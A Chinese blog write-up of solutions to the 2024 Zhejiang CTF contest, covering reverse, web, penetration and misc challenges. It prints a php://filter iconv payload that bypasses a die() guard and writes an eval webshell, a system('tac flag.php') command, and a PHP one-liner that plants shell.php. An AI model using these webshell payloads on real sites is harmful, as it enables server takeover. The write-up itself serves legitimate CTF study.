【CTF解题】2024年浙江省CTF网络安全竞赛
【CTF解题】2024年浙江省CTF网络安全竞赛
2024-05-14 / 0 评论 / 778 阅读 / 8 点赞

【CTF解题】2024年浙江省CTF网络安全竞赛

发光的神
2024-05-14 / 0 评论 / 778 阅读 / 正在检测是否收录...

留言

随缘更新,只公布解题结果,太懒了。。。

lwfrkx3r.png

Reverse

模拟人生

lwfrbc8u.png

以上是sub_40350F函数内的代码,不难看出v15存储的就是做过处理的flag,关键就是 v15[i] >> 2 ^ 0xa,我们就模仿它写个脚本解下,就能拿到最终的flag。

v15 = [
   432, 408, 429, 438, 452, 246, 243, 417,
   423, 444, 236, 231, 203, 447, 227, 435, 
   252, 224, 204, 443, 419, 248, 442, 241,
   203, 251, 445, 239, 441, 254, 444, 246,
   203, 245, 255, 445, 434, 478
]
for num in v15:
    result = chr((num >> 2) ^ 0xA)
    print(result, end='')

Web

yc2_web1

lwfs6mz4.png

<?php
highlight_file(__FILE__);
error_reporting(0);
function waf01($x){
    if(preg_match('/http|https|utf|zlib|data|input|rot13|base64|string|log/i',$x)){
        die('You are hacker!!! No!!!');
    }
}
$file=$_GET['file'];
$contents=$_GET['contents'];
waf01($file);
file_put_contents($file, "<?php die();?>".$contents);

lwfsffgj.png

GET: ?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php&contents=?<hp pe@av(l_$OPTSa[aa]a;)>?
POST: aaaa=system("tac flag.php");

先GET请求下这个时候木马就被写入到服务器里了,然后POST提交就能获取到flag。

综合渗透1

lwfvsttn.png

这题要进后台先找打后台,然后账号密码爆破,账号密码 admin/admin
第一题是有提示,第二题flag:在home

综合渗透1-2

lwfvq2bs.png

lwfuzd03.png

<?php fwrite(fopen('shell.php','w'),'<?php eval($_POST["pass"]);?>');?>

前端找可执行php代码的地方,写入一句话木马。
第三个flag,在第二题有提示:在数据库。

综合渗透1-3

lwfv1mzs.png

这样就都找到了。

Crypto

...

Misc

伪加密

lwfsu3m7.png

找到 14 00 09 这段改成 14 00 00 保存,即可解zip压缩包伪加密。

地狱模式

lwft1fbv.png

题目是一个jar文件,玩游戏坚持一分钟就给你flag,这里直接反编译下取flag。

打篮球之前先找到flag吧

lwftak3e.png

压缩包里是一个ELF文件,我直接用strings 过滤下flag,直接就拿到了。

lwftelnt.png

这是sql盲注嘛?

lwftxchh.png

直接用http对象列表查看,字节大小定位返回内容,这里我已经确定 21 bytes 是成功的,那么排序下找盲注的数字,数字ASCII转换字符拼接就是flag了。

...

8

评论 (0)

取消
0:00